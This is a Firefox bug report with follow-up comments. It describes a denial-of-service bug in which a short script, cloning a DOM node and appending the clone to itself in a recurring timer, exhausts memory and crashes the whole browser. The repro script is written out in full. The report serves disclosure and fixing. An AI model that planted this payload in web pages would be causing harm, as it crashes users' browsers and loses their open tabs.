1162962 - Exponential nodes growth crashes firefox through oom

Status: NEW

(Core :: DOM: Core & HTML, defect, P5)

Description

[SkyLined]

Attachment: Repro

User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Build ID: 20150415140819

Steps to reproduce:

Load this page:
<script>
  var oNode = document.createElement("A");
  setTimeout(crash, 0);
  function crash() {
    setTimeout(crash, 0);
    oNode.appendChild(oNode.cloneNode(true));
  };
</script>


Actual results:

The JavaScript constructs a tree of nested DOM Nodes, which grows exponentially. This causes 100% CPU usage. Firefox becomes unresponsive but no "unresponsive script" dialog is shown that would allow a user to kill the script. Eventually all memory is consumed and Firefox terminates itself, closing all open tabs.


Expected results:

1) An "unresponsive script" dialog should be shown, so the user may kill the script.
2) It should not be this easy for a webpage to crash Firefox; this type of DoS should result in a "crash" for the page, not the entire browser.

Comment 1

[u279076]

I confirm this bug exists from the latest Nightly back to at least Firefox 17. This testcase crashes Firefox without showing the crash reporter. When running Firefox from terminal I get the following output on crash:

> out of memory: 0x00000000000000C8 bytes requested
> ExceptionHandler::GenerateDump waitpid failed:No child processes

Comment 2

[u279076]

FWIW, Chromium in Ubuntu crashes the tab and not the entire process.

Comment 3

[Firefox Bug Husbandry Bot]

https://bugzilla.mozilla.org/show_bug.cgi?id=1472046

Move all DOM bugs that haven’t been updated in more than 3 years and has no one currently assigned to P5.

If you have questions, please contact :mdaly.